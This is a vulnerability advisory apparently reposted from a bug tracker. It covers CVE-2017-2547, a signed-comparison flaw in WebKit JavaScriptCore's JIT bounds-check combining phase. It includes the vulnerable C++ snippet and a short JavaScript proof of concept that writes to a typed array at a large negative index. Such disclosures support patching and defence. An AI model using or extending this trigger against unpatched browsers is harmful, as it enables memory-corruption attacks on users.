WebKit JSC Jit Optimization Check Failure

Published
Credit
Risk
2017.06.16
lokihardt
Low
CWE
CVE
Local
Remote
N/A
CVE-2017-2547
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

WebKit: JSC: JIT optimization check failed in IntegerCheckCombiningPhase::handleBlock

CVE-2017-2547


When compiling Javascript code into machine code, bound checks for all accesses to a typed array are also inserted. These bound checks are re-optimized and the unnecessary checks are removed, which is performed by IntegerCheckCombiningPhase::handleBlock.
For example, when the following JavaScript code is compiled, there are all bound checks for 8, 5, 2, but after the optimization, the checks for 5 and 2 are removed, and the only check for 8 will remain.

function f() {
let arr = new Uint32Array(10);
for (let i = 0; i < 0x100000; i++) {
parseInt();
}
arr[8] = 1;
arr[5] = 2;
arr[2] = 3;
}

f();

Note: parseInt is for forcing to start the JIT optimization.

Here's a snippet IntegerCheckCombiningPhase::handleBlock.

void handleBlock(BlockIndex blockIndex)
{
...
if (range.m_count) {
if (data.m_addend > range.m_maxBound) {
range.m_maxBound = data.m_addend;
range.m_maxOrigin = node->origin.semantic;
} else if (data.m_addend < range.m_minBound) {
range.m_minBound = data.m_addend;
range.m_minOrigin = node->origin.semantic;
}
...
}

The problem is that the check |data.m_addend > range.m_maxBound| is a signed comparison.

PoC:
function f() {
let arr = new Uint32Array(10);
for (let i = 0; i < 0x100000; i++) {
parseInt();
}
arr[8] = 1;
arr[-0x12345678] = 2;
}

f();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com